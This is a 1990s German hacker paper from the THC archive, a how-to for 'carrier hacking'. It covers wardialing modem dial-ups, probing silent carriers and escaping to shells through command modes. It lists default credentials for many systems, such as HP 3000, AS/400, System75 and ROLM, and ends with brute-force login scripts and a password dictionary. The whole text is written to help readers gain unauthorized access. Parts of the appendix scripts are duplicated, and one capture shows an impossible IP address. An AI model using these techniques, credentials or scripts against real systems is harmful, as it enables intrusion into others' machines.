8226f7ca69371fe94cbe7b8f1ca87c1ed20cf3da
[oweals/thc-archive.git] / Papers / carriers.txt
1 \r
2 \r
3 \r
4 \r
5                               CARRIER HACKING\r
6 \r
7                                  by Giemor\r
8 \r
9 \r
10 \r
11 \r
12 \r
13 \r
14 Warum Carrier Scanning/Hacking\r
15 ------------------------------\r
16 \r
17 In der heutigen Zeit ist der Zugang zum Internet im Vergleich zu den USA \r
18 sehr teuer, also kann man sich andere Wege suchen die eigenen Wege zu senken.\r
19 Zum Beispiel mit einer 0130 gebuehrenfreien Nummer der Telekom.\r
20 Es reicht ja schon wenn man ein Tymnet, Datex-P oder Sprintnet Dial-up findet\r
21 und sich von dort aus zu einen Provider weiterverbinden laesst wie Compuserve,\r
22 IBM-NET oder Aol. Mit etwas Glueck findet man einen Outdial womit man sich\r
23 dann weiter verbinden lassen kann. Oder man findet zugang zu Telnet, TN3270,\r
24 FTP, PPP, SLIP, Telenet, Datapac, Telepac, Decnet, X25, etc...\r
25 Aber auch zum Zeitvertreib kann man sich z.B. einige oeffentliche BBS (oder\r
26 nicht-oeffentliche in die man sich social-engineered) einloggen und mit\r
27 Kumpels leicht Software austauschen oder man versucht herauszufinden, was\r
28 sich z.B hinter den Grossrechnern des typs HP3000 oder HP MPE-XL verbirgt. \r
29 \r
30 \r
31 \r
32 Wie findet man Carriers\r
33 -----------------------\r
34 \r
35 Der beste und schnellste Weg ist sie mit einem Wardialer zu scannen.\r
36 (thc-scan, toneloc, a-dial). Man kann mit diesen Programmen einen bestimmten \r
37 Bereich von Telefonnummern durchscannen lassen, wo man viel interessantes\r
38 finden kann, uns aber speziell hier die gefundenen Modems interessieren.\r
39 Der Scanner hat zudem den Vorteil, dass er die heufigsten emulationen, parity, \r
40 data length, stop bits, ausprobiert sowie breaks sendet, <cr>, <.> etc. und \r
41 schliesslich gefundene Rufnummer mit dem Text, den das gefundene Modem\r
42 ausgibt in einer Logdatei speichert.\r
43 Es ist von grossem Vorteil wenn das Scan-Modem die VOICE Antwort unterstuetzt,\r
44 da man so mit bis zu 900% die Geschwindigkeit des Abscannens steigern kann.\r
45 \r
46 \r
47 \r
48 Was sind Silent Carriers\r
49 ------------------------\r
50 \r
51 Sehr oft bekommt man einen Connect aber nichts passiert - aber irgendein System\r
52 muss ja dahinter sein. Entweder man benutzt eine falsche Terminal Emulation,\r
53 oder die Baudrate ist zu hoch, oder parity, data length, stop bits sind falsch\r
54 eingestellt. \r
55 a) aendert parity, data length, stop bits, auf 7S1, 7S2, 8E2, 8E1.\r
56    die meisten Systeme benutzten 8N1, 7E1 und 7O1.\r
57 b) aendert die Terminal emulation: \r
58    \r
59    IBM 3101                    TV 910              BEEHIVE ATL078\r
60    IBM PC/FTTERM COLOR         LS ADM3A            UDT01\r
61    IBM PC/FTTERM MONO          ADDS VP             UDT02\r
62    IBM 3161/62/63              HAZEL 1500          UDT03\r
63    IBM 3151                    HAZEL ESP I         UDT04\r
64    IBM 3164                    HAZEL ESP II        UDT05\r
65    VT52                        NT DISPLAY          ANSI\r
66    VT100                       TT 5410             ANSI-BBS\r
67    VT220                       TT 5420\r
68    FALCO 500                   HP 2621B            Qmodem Pro unterstuetzt\r
69    WYSE 50                     DG D210                diese Emulationen \r
70                                               \r
71 c) aendert die baudrate auf 300, 600, 1200 probiert alles was euer Terminal\r
72    Programm unterstuetzt.\r
73 d) drueckt oefters hinter einander, <cr>, esc, .' sendet mehrere breaks, \r
74 e) Manchmal kommt es auch einfach vor das Modems nicht miteinander auskommen,\r
75    und dann keinen output anzeigen. Zum optimalen Scannen eignet sich am\r
76    besten ein Zyxel und ein USR Courier, aeltere Modelle reichen.\r
77 f) im Anhang ist ein Login Hacker Script fuer Silent Carriers bei denen a bis e\r
78    versagt ;-)\r
79    \r
80 \r
81 \r
82 Ich habe ein System gefunden\r
83 ----------------------------\r
84 \r
85 Jetzt muss man erst einmal wissen was fuer ein System man gefunden hat.\r
86 Dazu eine Liste mit System Namen und standart Accounts im zweiten Teil.\r
87 Dann kann man z.B. alle standart Accounts durchprobieren.\r
88 Wenn man den Betreiber des Systemes kennt, z.B eine Firma, dann sollte\r
89 man deren Produkte oder Mitarbeiter Namen als login und Password\r
90 versuchen. Wenn das alles nichts hilft bleibt nur noch Brute Force \r
91 Hacking uebrig. Man probiert mit einem programm alle moeglichen \r
92 Kompinationen, Buchstaben und Zahlen an dem System aus. Am besten man\r
93 macht das an einem System wo man endlos eingabe versuche hat. Ein gutes\r
94 Programm dafuer ist der Thc-Login Hacker, man kann ihn an jedes beliebige\r
95 System anpassen weil er mit Script Technik arbeitet. Ein Beispielscript\r
96 gibts dazu im Anhang.\r
97 \r
98 \r
99 \r
100 Suspend/Command Modus\r
101 ---------------------\r
102 \r
103 Manche Firmen haben ihre dialups echt gut gesichert. Unknackbare Passwoerter\r
104 etc. etc. - nur haben sie vielleicht etwas uebersehen :\r
105 Viele Programme haben einen "Command Mode", wo man obwohl das Programm laeuft\r
106 noch Einstellungen veraendern kann. Ein typisches Beispiel ist z.B. beim\r
107 Modem das "+++" wo man dann Modem Kommandos eingeben kann, und dann mit "AT O"\r
108 die Verbindung weiter benutzen kann. Andere Programme lassen sich in den\r
109 Hintergrund suspenden und man kann eine shell bekommen (z.B. bei unix)\r
110 Wie findet man solche Command/Suspend Modes? Sendet ein -BREAK-, ^Z, ^], ^+\r
111 sowie alle weiteren Control-Codes von ^A ueber ^Z bis ^] (01 bis 29).\r
112 Was kann man in solchen Modi machen? Nun das haengt vom Programm ab das so\r
113 einen Command modus bietet oder das System was einen das Programm suspenden\r
114 laesst. Bei Unix z.B. hat man eine shell, mit Glueck sogar eine root shell,\r
115 also jackpot. Bei dem Dienstprogramm telnet auf unix, oder auch manche\r
116 Dec-Server und Ascend Dialups kommt man in einen command modus wo man z.B.\r
117 einen telnet, ping oder sogar ppp machen kann - kann also so das Netzwerk\r
118 abscannen oder sogar hacken.\r
119 \r
120 \r
121 \r
122 Sonderfall: Internet\r
123 --------------------\r
124 \r
125 Besonders interessant sind Rechner die am Internet angeschlossen sind.\r
126 Bei manchen Connects sieht man z.B. eine IP Adresse, bei anderen den vollen\r
127 hostname + domain. Damit kann man z.B. problemlos herausfinden in welchem\r
128 Netz die sind (traceroute, broadcast pings, etc.) und versuchen vom Internet\r
129 in den Host oder das Netzwerk hineinzukommen.\r
130 Falls man nur den hostname sieht kann man sich von ftp.nw.com (Netwizards)\r
131 die gesamten ping-baren hosts aller domains holen, z.B. der .com domain und\r
132 darin leicht mit einem grep schauen zu welchem Netzwerk der Rechner gehoert.\r
133 Falls er nicht in den Listen ist oder aber bei hostname+domain mit ping oder\r
134 traceroute nicht zu erreichen ist, ist er entweder nicht angeschlossen, oder\r
135 aber hinter einer Firewall, also wenn man nicht wirklich gut im hacking ist\r
136 die Finger davon lassen.\r
137 \r
138 -------------------------------capture----------------------------------------\r
139 CONNECT 14400/ARQ/MNP5\r
140 Trying ...\r
141 Connected to 192.354.24.5\r
142 Escape character is '^]'.\r
143 \r
144 UNIX(r) System V Release 4.0 (sisy500)\r
145 \r
146 Login:\r
147 -------------------------------capture----------------------------------------\r
148 \r
149 \r
150 \r
151 Systeme mit standart Accounts\r
152 -----------------------------\r
153 \r
154 ------------------------------------------------------------------------------\r
155 DECserver Communications Server\r
156 \r
157 DECserver 90TL Communications Server V1.1 (BL44-10) - LAT V5.1\r
158 \r
159 Local -010- Session 1 to ZYNET1 established\r
160 \r
161 Login:\r
162 PASSWORD:\r
163 \r
164 Local -011- Session 1 disconnected from ZYNET1\r
165 hello>\r
166 \r
167 Standart Accounts:\r
168 ------------------\r
169 ACCESS\r
170 SYSTEM\r
171 \r
172 Eine Beschreibung von Dec-Servern in Hinsicht auf Outdials siehe THC-MAG2\r
173 ------------------------------------------------------------------------------\r
174 Xyplex Terminal Server.\r
175 \r
176 Enter username> \r
177 Local> \r
178   \r
179 Standart Accounts:\r
180 ------------------\r
181 ACCESS\r
182 SYSTEM\r
183 ------------------------------------------------------------------------------\r
184 \r
185 Annex Command Line Interpreter  *  Copyright 1991 Xylogics, Inc\r
186 \r
187 Checking authorization, Please wait...\r
188 Annex username:                  (Enter your NCI userid)\r
189 Annex password:                  (Enter your NCI password)\r
190 Permission granted\r
191 Annex:\r
192 \r
193 Befehl   Parameter                     Beschreibung\r
194 ---------------------------------------------------\r
195 ?        ? []                          :Hilfe\r
196 bg       bg [-dq] [%][%,+,-,,]         :Eine Aktion in Hintergrund setzen\r
197 fg       fg [-q] [%][%,+,-,,]          :zurueck zu einer aktuellen Aktion\r
198 hangup   hangup [-q]                   :Auflegen und Port reseten\r
199 help     help []                       :Hilfe\r
200 jobs     jobs                          :Zeigt aktuelle Aktionen an\r
201 kill     kill [%][%,+,-,,]...          :Kille eine Aktion\r
202 stty     stty [parameter [value]]...   :Show/Set Annex Port Parameter\r
203 telnet   telnet [-rsst] [ [port]]      :Starte Telnet Connection\r
204 who      who [[-l] []@ ...]            :Zeigt System User\r
205 \r
206 Standart accounts:\r
207 ------------------\r
208 guest     guest\r
209 ------------------------------------------------------------------------------\r
210 \r
211 ROLM PhoneMail 9252 9254 Microcode Version 5.2\r
212 Login: ?\r
213 Valid login modes are:\r
214 SYSADMIN,\r
215 TECH,\r
216 POLL.\r
217 Login:tech\r
218 Password:tech\r
219 ROLM PhoneMail 9252 9254 Microcode Version 5.2\r
220 Copyright (C) ROLM Systems 1991\r
221 All Rights Reserved.\r
222 Aktion:\r
223 \r
224        ( Mit den Befehl "?" oder help kommt man zum folgenden menue)\r
225 \r
226                The following commands are valid:\r
227   Activate <session #>         - Activate the session\r
228   Broadcast                    - Broadcast a message to all terminals\r
229   Connect <subsystem> <node #> - Invoke the subsystem\r
230   Terminate <session #>        - Terminate the session\r
231   List                         - List all open sessions\r
232   Logout                       - Terminate all sessions and log off.\r
233   Login <login mode>           - Logout and login again.\r
234   Display                      - Display sessions status on a site.\r
235   TechView <on/off>            - Enable/Disable TechView training.\r
236 ------------------------------------------------------------------\r
237 Beschreibung aus TFC05:\r
238 \r
239 ActivatePM       :    Starts the Phone Mail system.\r
240 AssignClasses    :    External program to assign COS to each user in the\r
241                       database. Only local non-Call Processing users are\r
242                       assigned classes.\r
243 BackupDataBase   :    Create a backup of the customer database on HD or\r
244                       floppies.\r
245 BackupNames      :    Copies name header information for all subscribers to\r
246                       a floppy/floppies.\r
247 CallProcessing   :    An external program to create and maintain Mailbox\r
248                       Profiles.\r
249 ChannelTrace     :    Lists the current state of each channel. Continously\r
250                       updates until interrupted.\r
251 DeactivatePM     :    Turn off PM system. DON'T USE THIS UNLESS YOU ARE\r
252                       VERY SURE OF WHAT YOU ARE DOING! Calls will no\r
253                       longer be taken by the PM if it is deactivated.\r
254 DList            :    Show distribution lists.\r
255 FFormat          :    Format a floppy disk. The single most useless command\r
256                       for a remote user.\r
257 LogOff           :    Quit session and go to session manager menu.\r
258 MonitorLogon     :    Monitor users logging in to PM.\r
259 MonitorTapLink   :    Shows tap traffic on CBX integrated systems. Continues\r
260                       to update until interrupted.\r
261 OCConfigAndTest  :    Utility to configure and test all outcalling\r
262                       related parameters.\r
263 Profile          :    Add All Clear Delete Fix List Modify Purge\r
264 Reports          :    Display reports.\r
265 CallActivity     :    Displays call activity by the hour, with averages.\r
266 \r
267 Standart accounts\r
268 -----------------\r
269 sysadmin  sysadmin\r
270 operator  operator\r
271 poll      poll oder tech\r
272 tech      tech oder operator\r
273 \r
274 Info:\r
275 Eine genaue Beschreibung ueber dieses System giebt es in TFC #5\r
276 ------------------------------------------------------------------------------\r
277 \r
278 ROLM CBX II\r
279 \r
280 ROLM CBXII  RELEASE 9004.2.34 RB295 9000D IBMHO27568\r
281 BIND DATE:  7/APR/93\r
282 COPYRIGHT 1980, 1993 ROLM COMPANY.  ALL RIGHTS RESERVED.\r
283 ROLM IS A REGISTERED TRADEMARK AND CBX IS A TRADEMARK OF ROLM COMPANY.\r
284 YOU HAVE ENTERED CPU 1\r
285 12:38:47 ON WEDNESDAY 2/15/1995\r
286 \r
287 USERNAME: op\r
288 \r
289 PASSWORD:\r
290 \r
291  INVALID USERNAME-PASSWORD PAIR\r
292 \r
293 Standart Accounts:\r
294 ------------------\r
295 op              op\r
296 op              operator\r
297 su              super\r
298 admin           pwp\r
299 eng             engineer\r
300 ------------------------------------------------------------------------------\r
301 \r
302 ARC NetBlazer Version 2.1\r
303 ARC-login:\r
304 \r
305 Standart Accounts:\r
306 ------------------\r
307 test\r
308 setup\r
309 remote\r
310 snmp\r
311 MAV\r
312 ------------------------------------------------------------------------------\r
313 \r
314 Telebit's NetBlazer Version 2.0x5\r
315 netblzr2 login:\r
316 \r
317 Standart Accounts:\r
318 ------------------\r
319 test\r
320 setup\r
321 remote\r
322 snmp\r
323 MAV\r
324 ------------------------------------------------------------------------------\r
325 \r
326 IFG's VAX 8650\r
327 \r
328 %SECURE-I-NET, Incoming number logged by Secure-net\r
329 \r
330 Username: \r
331 Password:\r
332 Welcome to VAX 8650\r
333 $\r
334 \r
335 Standart Accounts:\r
336 ------------------\r
337 Vax\r
338 Vms\r
339 Dcl\r
340 Demo\r
341 Test\r
342 Help\r
343 News\r
344 Guest\r
345 Decnet\r
346 Systest\r
347 Uetp\r
348 Default\r
349 User\r
350 Field\r
351 Service\r
352 System\r
353 Manager\r
354 Operator\r
355 ------------------------------------------------------------------------------\r
356 HP 3000\r
357 \r
358 MPE XL:\r
359 MPE XL:HELLO\r
360 Expected [session name,] user.acct [,group]. (CIERR 1424)\r
361 MPE XL:hello mgr.sys\r
362 ENTER ACCOUNT (SYS) PASSWORD:\r
363 ENTER ACCOUNT (SYS) PASSWORD:\r
364 ENTER ACCOUNT (SYS) PASSWORD:\r
365 \r
366 Standart Accounts:\r
367 ------------------\r
368 HELLO           MANAGER.SYS\r
369 HELLO           MGR.SYS\r
370 HELLO           FIELD.SUPPORT     HPUNSUP or SUPPORT or HP\r
371 HELLO           OP.OPERATOR\r
372 MGR             CAROLIAN\r
373 MGR             CCC\r
374 MGR             CNAS\r
375 MGR             CONV\r
376 MGR             COGNOS\r
377 OPERATOR        COGNOS\r
378 MANAGER         COGNOS\r
379 OPERATOR        DISC\r
380 MGR             HPDESK\r
381 MGR             HPWORD\r
382 FIELD           HPWORD\r
383 MGR             HPOFFICE\r
384 SPOOLMAN        HPOFFICE\r
385 ADVMAIL         HPOFFICE\r
386 MAIL            HPOFFICE\r
387 WP              HPOFFICE\r
388 MANAGER         HPOFFICE\r
389 MGR             HPONLY\r
390 FIELD           HPP187\r
391 MGR             HPP187\r
392 MGR             HPP189\r
393 MGR             HPP196\r
394 MGR             INTX3\r
395 MGR             ITF3000\r
396 MANAGER         ITF3000\r
397 MAIL            MAIL\r
398 MGR             NETBASE\r
399 MGR             REGO\r
400 MGR             RJE\r
401 MGR             ROBELLE\r
402 MANAGER         SECURITY\r
403 MGR             SECURITY\r
404 FIELD           SERVICE\r
405 MANAGER         SYS\r
406 MGR             SYS\r
407 PCUSER          SYS\r
408 RSBCMON         SYS\r
409 OPERATOR        SYS\r
410 OPERATOR        SYSTEM\r
411 FIELD           SUPPORT\r
412 OPERATOR        SUPPORT\r
413 MANAGER         TCH\r
414 MAIL            TELESUP\r
415 MANAGER         TELESUP\r
416 MGR             TELESUP\r
417 SYS             TELESUP\r
418 MGE             VESOFT\r
419 MGE             VESOFT\r
420 MGR             WORD\r
421 MGR             XLSERVER\r
422 \r
423 Ein Login Hacker Script gibt es im Anhang\r
424 ------------------------------------------------------------------------------\r
425 \r
426 System75\r
427 \r
428 Login: root\r
429 INCORRECT LOGIN\r
430 \r
431 Login: browse\r
432 Password:\r
433 \r
434 Software Version: G3s.b16.2.2\r
435 \r
436 Terminal Type (513, 4410, 4425): [513]\r
437 \r
438 Standart Accounts:\r
439 ------------------\r
440 bcim            bcimpw\r
441 bciim           bciimpw\r
442 bcms            bcmspw, bcms\r
443 bcnas           bcnspw\r
444 blue            bluepw\r
445 browse          looker, browsepw\r
446 craft           crftpw, craftpw, crack\r
447 cust            custpw\r
448 enquiry         enquirypw\r
449 field           support\r
450 inads           indspw, inadspw, inads\r
451 init            initpw\r
452 kraft           kraftpw\r
453 locate          locatepw\r
454 maint           maintpw, rwmaint\r
455 nms             nmspw\r
456 rcust           rcustpw\r
457 support         supportpw\r
458 tech            field\r
459 ------------------------------------------------------------------------------\r
460 AIX\r
461 \r
462 IBM AIX Version 3 for RISC System/6000\r
463 (C) Copyrights by IBM and by others 1982, 1990.\r
464 login:\r
465 \r
466 Standart Accounts:\r
467 ------------------\r
468 guest     guest\r
469 ------------------------------------------------------------------------------\r
470 \r
471 AS/400\r
472 \r
473 UserID?\r
474 Password?\r
475 \r
476 Standart Accounts:\r
477 ------------------\r
478 qsecofr         qsecofr\r
479 qsysopr         qsysopr\r
480 qpgmr           qpgmr     \r
481 ibm             password\r
482 ibm             2222\r
483 ibm             service\r
484 qsecofr         1111111\r
485 qsecofr         2222222\r
486 qserv           qserv\r
487 qsvr            qsvr\r
488 secofr          secofr\r
489 qsrv            ibmce1\r
490 ------------------------------------------------------------------------------\r
491 \r
492 \r
493 Systeme ohne Standart Accounts\r
494 ------------------------------\r
495 \r
496 CDC Cyber\r
497 \r
498 WELCOME TO THE NOS SOFTWARE SYSTEM.\r
499 COPYRIGHT CONTROL DATA 1978, 1987.\r
500 \r
501 88/02/16. 02.36.53. N265100\r
502 CSUS CYBER 170-730.                     NOS 2.5.2-678/3.\r
503 FAMILY:\r
504 \r
505 You would normally just hit return at the family prompt.  Next prompt is:\r
506 \r
507 USER NAME:\r
508 ------------------------------------------------------------------------------\r
509 \r
510 Cisco Router\r
511 \r
512 cisco_router_1>                        (kann jeder beliebige Promt sein)\r
513 cisco_router_1>LOGIN\r
514 Username:\r
515 Password:\r
516 ------------------------------------------------------------------------------\r
517 \r
518 GTN\r
519 \r
520 WELCOME TO CITIBANK. PLEASE SIGN ON.\r
521 XXXXXXXX\r
522 \r
523 @\r
524 PASSWORD =\r
525 \r
526 @\r
527 \r
528 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r
529 \r
530 PLEASE ENTER YOUR ID:-1->\r
531 PLEASE ENTER YOUR PASSWORD:-2->\r
532 \r
533 CITICORP (CITY NAME). KEY GHELP FOR HELP.\r
534   XXX.XXX\r
535  PLEASE SELECT SERVICE REQUIRED.-3->\r
536 ------------------------------------------------------------------------------\r
537 \r
538 Lantronix Terminal Server\r
539 \r
540 Lantronix ETS16 Version V3.1/1(940623)\r
541 \r
542 Type HELP at the 'Local_15> ' prompt for assistance.\r
543 \r
544 Login password>\r
545 ------------------------------------------------------------------------------\r
546 \r
547 NIH Timesharing\r
548 \r
549 NIH Tri-SMP 7.02-FF  16:30:04 TTY11\r
550 system 1378/1381/1453 Connected to Node Happy(40) Line # 12\r
551 Please LOGIN\r
552 .\r
553 ------------------------------------------------------------------------------\r
554 \r
555 VM/ESA ONLINE\r
556 \r
557                                           TBVM2 VM/ESA Rel 1.1     PUT 9200\r
558 \r
559 Fill in your USERID and PASSWORD and press ENTER\r
560 (Your password will not appear when you type it)\r
561 USERID   ===>\r
562 PASSWORD ===>\r
563 \r
564 COMMAND  ===>\r
565 ------------------------------------------------------------------------------\r
566 \r
567 \r
568 \r
569 ANHANG:\r
570 \r
571 Login Hacker Scripts:\r
572 ---------------------\r
573 \r
574 [BEGIN hp_mpe.txt]\r
575 ;\r
576 ;\r
577 ; ------------------------------------------------------------------------\r
578 ;  HP MPE-XL      : SAC-Script for THC-Login-Hacker v1.0  (by van Hauser)\r
579 ; ------------------------------------------------------------------------\r
580 ;\r
581 ;\r
582 ; MPE XL:\r
583 ; EXPECTED A :HELLO COMMAND. (CIERR 6057)\r
584 ; MPE XL: hello\r
585 ; EXPECTED [SESSION NAME,] USER.ACCT [,GROUP]   (CIERR 1424)\r
586 ;\r
587\r
588 =============================================================================\r
589 #DEFINE\r
590 PHONE_NR=*\r
591 LOGFILE=*.log\r
592 DIAL_TRIES=100\r
593 LOGIN_TRIES=0\r
594 DIC(1)=hp_mpe_a.dic\r
595 ; uncomment command lines below to check for 6 more common MPE passwords\r
596 \r
597 #NOCARRIER\r
598 LOG(CARRIER LOST on $DATE at $TIME)\r
599 \r
600 LOG()\r
601 GOTO(1)\r
602 \r
603 #START\r
604 LOG(--------------------------------------------------------------------------)\r
605 LOG( TARGET : $PHONE_NR )\r
606 LOG( DATE : $DATE )\r
607 LOG( TIME : $TIME )\r
608 LOG()\r
609 LOG_SESSION_ON\r
610 SET D_TMP=1\r
611 SET S_TMP=X\r
612 \r
613 :1\r
614 SET STRING=X\r
615 DIAL\r
616 WAIT(1)\r
617 IF STRING~XL THEN GOTO(2)\r
618 WAIT4STRING(2,^M,6,GOTO(1),XL)\r
619 \r
620 :2\r
621 SET STRING=X\r
622 \r
623 SEND_(HELLO )\r
624 IF D_TMP=1 THEN SEND_(ADVMAIL.)\r
625 IF D_TMP=2 THEN SEND_(FIELD.)\r
626 IF D_TMP=3 THEN SEND_(MAIL.)\r
627 IF D_TMP=4 THEN SEND_(MANAGER.)\r
628 IF D_TMP=5 THEN SEND_(MGE.)\r
629 IF D_TMP=6 THEN SEND_(MGR.)\r
630 IF D_TMP=7 THEN SEND_(OP.)\r
631 IF D_TMP=8 THEN SEND_(OPERATOR.)\r
632 IF D_TMP=9 THEN SEND_(PCUSER.)\r
633 IF D_TMP=10 THEN SEND_(RSBCMON.)\r
634 IF D_TMP=11 THEN SEND_(SPOOLMAN.)\r
635 IF D_TMP=12 THEN SEND_(SYS.)\r
636 IF D_TMP=13 THEN SEND_(WP.)\r
637 \r
638 IF S_TMP=X THEN SEND_NEXT_DIC(1)\r
639 IF S_TMP=Y THEN SEND_DIC(1)\r
640 IF S_TMP=Z THEN SEND_DIC(1)\r
641 IF S_TMP=A THEN SEND_DIC(1)\r
642 ; IF S_TMP=B THEN SEND_DIC(1)\r
643 ; IF S_TMP=C THEN SEND_DIC(1)\r
644 \r
645 IF D_TMP=13 THEN SET S_TMP=X\r
646 IF D_TMP=13 THEN SET D_TMP=1\r
647 WAIT(1)\r
648 ; set this higher if the system response is slow\r
649 IF STRING2~HELLO THEN GOTO(3)\r
650 IF STRING2~exists THEN GOTO(3)\r
651 IF STRING2~on-ex THEN GOTO(4)\r
652 IF STRING2~ASSW THEN GOTO(5)\r
653 WAIT(2)\r
654 IF STRING2~HELLO THEN GOTO(3)\r
655 IF STRING2~exists THEN GOTO(3)\r
656 IF STRING2~on-ex THEN GOTO(4)\r
657 IF STRING2~ASSW THEN GOTO(5)\r
658 GOTO(1)\r
659 \r
660 :3\r
661 INC(D_TMP)\r
662 GOTO(2)\r
663 \r
664 :4\r
665 SET S_TMP=X\r
666 SET D_TMP=1\r
667 \r
668 :5\r
669 IF S_TMP=Z THEN GOTO(6)\r
670 IF S_TMP=A THEN GOTO(7)\r
671 ;IF S_TMP=B THEN GOTO(8)\r
672 ;IF S_TMP=C THEN GOTO(9)\r
673 SET S_TMP=Z\r
674 LOG_($DIC(1))\r
675 SEND_DIC(1)\r
676 WAIT(1)\r
677 LOG_(HPOnly)\r
678 SEND(HPOnly)\r
679 WAIT(1)\r
680 LOG_(HP)\r
681 SEND(HP)\r
682 WAIT(2)\r
683 GOTO(1)\r
684 \r
685 :6\r
686 SET S_TMP=A\r
687 LOG_(MPE)\r
688 SEND(MPE)\r
689 \r
690 LOG_(Manager)\r
691 SEND(Manager)\r
692 WAIT(1)\r
693 LOG_(mgr)\r
694 SEND(mgr)\r
695 WAIT(2)\r
696 GOTO(1)\r
697 \r
698 :7\r
699 SET S_TMP=X\r
700 ; SET S_TMP=B\r
701 LOG_(remote)\r
702 SEND(remote)\r
703 WAIT(1)\r
704 LOG_(TeleSup)\r
705 SEND(TeleSup)\r
706 WAIT(1)\r
707 LOG_(operator)\r
708 SEND(operator)\r
709 WAIT(2)\r
710 GOTO(1)\r
711 \r
712 \r
713 ; SET S_TMP=C\r
714 ; LOG_(tech)\r
715 ; SEND(tech)\r
716 ; WAIT(1)\r
717 ; LOG_(mail)\r
718 ; SEND(mail)\r
719 ; WAIT(1)\r
720 ; LOG_(hpoffice)\r
721 ; SEND(hpoffice)\r
722 ; WAIT(2)\r
723 ; GOTO(1)\r
724 \r
725 ; :9\r
726 ; SET S_TMP=X\r
727 ; LOG_(sys)\r
728 ; SEND(sys)\r
729 ; WAIT(1)\r
730 ; LOG_(security)\r
731 ; SEND(security)\r
732 ; WAIT(1)\r
733 ; LOG_(support)\r
734 ; SEND(support)\r
735 ; LOG_(hpoffice)\r
736 ; SEND(hpoffice)\r
737 ; WAIT(2)\r
738 ; GOTO(1)\r
739 \r
740 ; :9\r
741 ; SET S_TMP=X\r
742 ; LOG_(sys)\r
743 ; SEND(sys)\r
744 ; WAIT(1)\r
745 ; LOG_(security)\r
746 ; SEND(security)\r
747 ; WAIT(1)\r
748 ; LOG_(support)\r
749 ; SEND(support)\r
750 \r
751 ; GOTO(1)\r
752 \r
753 :100\r
754 LOG()\r
755 LOG( END OF : $PHONE_NR )\r
756 LOG(--------------------------------------------------------------------------)\r
757 #END\r
758 [END]\r
759 \r
760 \r
761 \r
762 [BEGIN hp_mpe_a.dic]\r
763 CAROLIAN\r
764 CCC\r
765 CNAS\r
766 COGNOS\r
767 CONV\r
768 DISC\r
769 HP\r
770 HPDESK\r
771 HPOFFICE\r
772 HPONLY\r
773 HPP187\r
774 HPP189\r
775 HPP196\r
776 HPUNSUP\r
777 HPWORD\r
778 INTX3\r
779 ITF3000\r
780 MAIL\r
781 NETBASE\r
782 OPERATOR\r
783 REGO\r
784 RJE\r
785 ROBELLE\r
786 HPP187\r
787 HPP189\r
788 HPP196\r
789 HPUNSUP\r
790 HPWORD\r
791 INTX3\r
792 ITF3000\r
793 MAIL\r
794 NETBASE\r
795 OPERATOR\r
796 REGO\r
797 RJE\r
798 ROBELLE\r
799 SERVICE\r
800 SUPPORT\r
801 SYS\r
802 SYSTEM\r
803 TCH\r
804 TELESUP\r
805 VESOFT\r
806 WORD\r
807 XLSERVER\r
808 [END]\r
809 \r
810 \r
811 [BEGIN silent.txt]\r
812 ;\r
813 ;\r
814 ; ------------------------------------------------------------------------\r
815 ;  Silent Dialups : SAC-Script for THC-Login-Hacker v1.0  (by van Hauser)\r
816 ; ------------------------------------------------------------------------\r
817 ;\r
818 ; Silent Dialups : No output/response from dialup modem\r
819 ;                  (both types, 30 sec hangup & unlimited)\r
820 ;\r
821 ; (takes approx. 9-10 hours)\r
822 ;\r
823\r
824 =============================================================================\r
825 #DEFINE\r
826 PHONE_NR=####\r
827 LOGFILE=####\r
828 DIAL_TRIES=50\r
829 LOGIN_TRIES=0\r
830 BRUTE(1)=^$,1,1,3\r
831 ; tries every combination of Controll-Chars and Misc. Chars from 1 to 3 length.\r
832 \r
833 #NOCARRIER\r
834 CHECK4OUTPUT(OFF)\r
835 LOG(CARRIER LOST on $DATE at $TIME)\r
836 \r
837 LOG()\r
838 LOG()\r
839 GOTO(1)\r
840 \r
841 #START\r
842 LOG(--------------------------------------------------------------------------)\r
843 LOG( TARGET : $PHONE_NR )\r
844 LOG( DATE : $DATE )\r
845 LOG( TIME : $TIME )\r
846 LOG()\r
847 LOG_SESSION_ON\r
848 \r
849 :1\r
850 DIAL\r
851 WAIT(1)\r
852 CHECK4OUTPUT(99)\r
853 \r
854 :2\r
855 SEND_NEXT_BRUTE(1)\r
856 WAIT_(255)\r
857 ;waits 255ms between every attempt\r
858 GOTO(2)\r
859 CHECK4OUTPUT(99)\r
860 \r
861 :2\r
862 SEND_NEXT_BRUTE(1)\r
863 WAIT_(255)\r
864 ;waits 255ms between every attempt\r
865 GOTO(2)\r
866 \r
867 :99\r
868 CHECK4CARRIER(OFF)\r
869 WAIT(5)\r
870 CHECK4CARRIER(#NOCARRIER)\r
871 \r
872 :100\r
873 HANGUP\r
874 BEEP\r
875 BEEP\r
876 BEEP\r
877 LOG()\r
878 LOG()\r
879 LOG( FOUND : $BRUTE(1))\r
880 LOG(--------------------------------------------------------------------------)\r
881 #END\r
882 [END]\r
883 \r
884 \1a